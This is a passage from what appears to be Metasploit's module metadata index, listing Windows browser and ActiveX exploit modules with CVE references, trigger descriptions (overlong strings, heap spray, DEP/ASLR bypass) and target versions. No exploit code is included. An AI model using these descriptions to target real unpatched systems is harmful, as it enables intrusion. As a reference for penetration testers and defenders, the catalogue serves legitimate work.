"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-6016",
"OSVDB-42358",
"BID-26904",
"URL-http://secunia.com/advisories/27885/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_backupexec_pvcalendar",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_consoleutilities_browseandsavefile": {
"name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile",
"rank": 300,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"Nikolas Sotiriu (lofi)"
],
"description": "This module exploits a stack buffer overflow in Symantec's ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2009-3031",
"OSVDB-59597",
"BID-36698",
"URL-http://sotiriu.de/adv/NSOADV-2009-001.txt",
"URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"Windows XP SP2 Universal",
"Windows XP SP2 Pro German",
"Windows XP SP3 Pro German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/synactis_connecttosynactis_bof": {
"name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",
"full_name": "exploit/windows/browser/synactis_connecttosynactis_bof",
"rank": 300,
"disclosure_date": "2013-05-30",
"type": "exploit",
"author": [
"h1ch4m",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.",
"references": [
"OSVDB-93754",
"EDB-25835"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/synactis_connecttosynactis_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/systemrequirementslab_unsafe": {
"name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method",
"full_name": "exploit/windows/browser/systemrequirementslab_unsafe",
"rank": 600,
"disclosure_date": "2008-10-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0).",
"references": [
"CVE-2008-4385",
"OSVDB-50122",
"US-CERT-VU-166651"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/systemrequirementslab_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/teechart_pro": {
"name": "TeeChart Professional ActiveX Control Trusted Integer Dereference",
"full_name": "exploit/windows/browser/teechart_pro",
"rank": 300,
"disclosure_date": "2011-08-11",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76",
"references": [
"OSVDB-74446",
"URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP0-SP3 (IE6/IE7)",
"Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
"Windows 7 + JAVA + DEP bypass (IE8)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/teechart_pro.rb",
"is_install_path": true,
"ref_name": "windows/browser/teechart_pro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/tom_sawyer_tsgetx71ex552": {
"name": "Tom Sawyer Software GET Extension Factory Remote Code Execution",
"full_name": "exploit/windows/browser/tom_sawyer_tsgetx71ex552",
"rank": 300,
"disclosure_date": "2011-05-03",
"type": "exploit",
"author": [
"Elazar Broad",
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.",
"references": [
"CVE-2011-2217",
"OSVDB-73211",
"BID-48099",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb",
"is_install_path": true,
"ref_name": "windows/browser/tom_sawyer_tsgetx71ex552",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/trendmicro_extsetowner": {
"name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",
"full_name": "exploit/windows/browser/trendmicro_extsetowner",
"rank": 300,
"disclosure_date": "2010-08-25",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-3189",
"OSVDB-67561",
"ZDI-10-165",
"EDB-14878"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb",
"is_install_path": true,
"ref_name": "windows/browser/trendmicro_extsetowner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/trendmicro_officescan": {
"name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/trendmicro_officescan",
"rank": 300,
"disclosure_date": "2007-02-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-0325",
"OSVDB-33040",
"BID-22585"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/trendmicro_officescan.rb",
"is_install_path": true,
"ref_name": "windows/browser/trendmicro_officescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/tumbleweed_filetransfer": {
"name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/tumbleweed_filetransfer",
"rank": 500,
"disclosure_date": "2008-04-07",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2008-1724",
"OSVDB-44252",
"URL-http://www.aushack.com/200708-tumbleweed.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal vcst_eu.dll",
"Windows 2000 Pro English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb",
"is_install_path": true,
"ref_name": "windows/browser/tumbleweed_filetransfer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ubisoft_uplay_cmd_exec": {
"name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution",
"full_name": "exploit/windows/browser/ubisoft_uplay_cmd_exec",
"rank": 300,
"disclosure_date": "2012-07-29",
"type": "exploit",
"author": [
"Tavis Ormandy <taviso@cmpxchg8b.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"phillips321 <phillips321@phillips321.co.uk>",
"Richard Hicks <scriptmonkeyblog@gmail.com>"
],
"description": "The uplay ActiveX component allows an attacker to execute any command line action.\n The user must sign in (unless auto sign-in is enabled), and uplay must not already be\n running. Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.",
"references": [
"CVE-2012-4177",
"OSVDB-84402",
"URL-https://seclists.org/fulldisclosure/2012/Jul/375",
"URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ubisoft_uplay_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ultramjcam_openfiledig_bof": {
"name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",
"full_name": "exploit/windows/browser/ultramjcam_openfiledig_bof",
"rank": 300,
"disclosure_date": "2012-03-28",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to multibyte)\n overwriting the stack more than it should, which results in arbitrary code execution\n under the context of the user.",
"references": [
"CVE-2012-4876",
"OSVDB-80661",
"EDB-18675"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ultramjcam_openfiledig_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ultraoffice_httpupload": {
"name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",
"full_name": "exploit/windows/browser/ultraoffice_httpupload",
"rank": 400,
"disclosure_date": "2008-08-27",
"type": "exploit",
"author": [
"shinnai",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.",
"references": [
"CVE-2008-3878",
"OSVDB-47866",
"BID-30861",
"EDB-6318"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb",
"is_install_path": true,
"ref_name": "windows/browser/ultraoffice_httpupload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/verypdf_pdfview": {
"name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow",
"full_name": "exploit/windows/browser/verypdf_pdfview",
"rank": 300,
"disclosure_date": "2008-06-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"dean <dean@zerodaysolutions.com>"
],
"description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.",
"references": [
"CVE-2008-5492",
"OSVDB-49871",
"BID-32313"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/verypdf_pdfview.rb",
"is_install_path": true,
"ref_name": "windows/browser/verypdf_pdfview",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/viscom_movieplayer_drawtext": {
"name": "Viscom Software Movie Player Pro SDK ActiveX 6.8",
"full_name": "exploit/windows/browser/viscom_movieplayer_drawtext",
"rank": 300,
"disclosure_date": "2010-01-12",
"type": "exploit",
"author": [
"shinnai",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
"references": [
"CVE-2010-0356",
"OSVDB-61634",
"EDB-12320"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows IE6-7",
"Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb",
"is_install_path": true,
"ref_name": "windows/browser/viscom_movieplayer_drawtext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/vlc_amv": {
"name": "VLC AMV Dangling Pointer Vulnerability",
"full_name": "exploit/windows/browser/vlc_amv",
"rank": 400,
"disclosure_date": "2011-03-23",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.",
"references": [
"CVE-2010-3275",
"OSVDB-71277",
"URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files",
"URL-http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3",
"Internet Explorer 8 on XP SP3",
"Internet Explorer 7 on Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/vlc_amv.rb",
"is_install_path": true,
"ref_name": "windows/browser/vlc_amv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/vlc_mms_bof": {
"name": "VLC MMS Stream Handling Buffer Overflow",
"full_name": "exploit/windows/browser/vlc_mms_bof",
"rank": 300,
"disclosure_date": "2012-03-15",
"type": "exploit",
"author": [
"Florent Hochwelker",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as the attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.",
"references": [
"CVE-2012-1775",
"OSVDB-80188",
"URL-http://www.videolan.org/security/sa1201.html",
"URL-http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/vlc_mms_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/vlc_mms_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/webdav_dll_hijacker": {
"name": "WebDAV Application DLL Hijacker",
"full_name": "exploit/windows/browser/webdav_dll_hijacker",
"rank": 0,
"disclosure_date": "2010-08-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"jcran <jcran@metasploit.com>"
],
"description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. The default EXTENSIONS option\n must be configured to specify a vulnerable application type.",
"references": [
"URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html",
"URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb",
"is_install_path": true,
"ref_name": "windows/browser/webdav_dll_hijacker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/webex_ucf_newobject": {
"name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",
"full_name": "exploit/windows/browser/webex_ucf_newobject",
"rank": 400,
"disclosure_date": "2008-08-06",
"type": "exploit",
"author": [
"Tobias Klein",
"Elazar Broad",
"Guido Landi",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.",
"references": [
"CVE-2008-3558",
"OSVDB-47344",
"BID-30578",
"EDB-6220",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849",
"URL-http://www.trapkit.de/advisories/TKADV2008-009.txt",
"URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html",
"URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb",
"is_install_path": true,
"ref_name": "windows/browser/webex_ucf_newobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/wellintech_kingscada_kxclientdownload": {
"name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/wellintech_kingscada_kxclientdownload",
"rank": 400,
"disclosure_date": "2014-01-14",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellinTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.",
"references": [
"CVE-2013-2827",
"OSVDB-102135",
"BID-64941",
"ZDI-14-011",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb",
"is_install_path": true,
"ref_name": "windows/browser/wellintech_kingscada_kxclientdownload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winamp_playlist_unc": {
"name": "Winamp Playlist UNC Path Computer Name Overflow",
"full_name": "exploit/windows/browser/winamp_playlist_unc",
"rank": 500,
"disclosure_date": "2006-01-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Faithless <rhyskidd@gmail.com>"
],
"description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. This module has only\n been successfully tested on Winamp 5.11 and 5.12.",
"references": [
"CVE-2006-0476",
"OSVDB-22789",
"BID-16410"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.12 Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb",
"is_install_path": true,
"ref_name": "windows/browser/winamp_playlist_unc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winamp_ultravox": {
"name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",
"full_name": "exploit/windows/browser/winamp_ultravox",
"rank": 300,
"disclosure_date": "2008-01-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.",
"references": [
"CVE-2008-0065",
"OSVDB-41707",
"BID-27344"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.24"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/winamp_ultravox.rb",
"is_install_path": true,
"ref_name": "windows/browser/winamp_ultravox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/windvd7_applicationtype": {
"name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/windvd7_applicationtype",
"rank": 300,
"disclosure_date": "2007-03-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2007-0348",
"OSVDB-34315",
"BID-23071"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb",
"is_install_path": true,
"ref_name": "windows/browser/windvd7_applicationtype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winzip_fileview": {
"name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/winzip_fileview",
"rank": 300,
"disclosure_date": "2007-11-02",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. WinZip 10.0 builds up to and including Build 6667 are vulnerable.",
"references": [
"CVE-2006-5198",
"OSVDB-30433",
"BID-21060"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/winzip_fileview.rb",
"is_install_path": true,
"ref_name": "windows/browser/winzip_fileview",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/wmi_admintools": {
"name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/wmi_admintools",
"rank": 500,
"disclosure_date": "2010-12-21",
"type": "exploit",
"author": [
"WooYun",
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).",
"references": [
"OSVDB-69942",
"CVE-2010-3973",
"BID-45546",
"URL-http://wooyun.org/bug.php?action=view&id=1006",
"URL-http://secunia.com/advisories/42693",
"URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
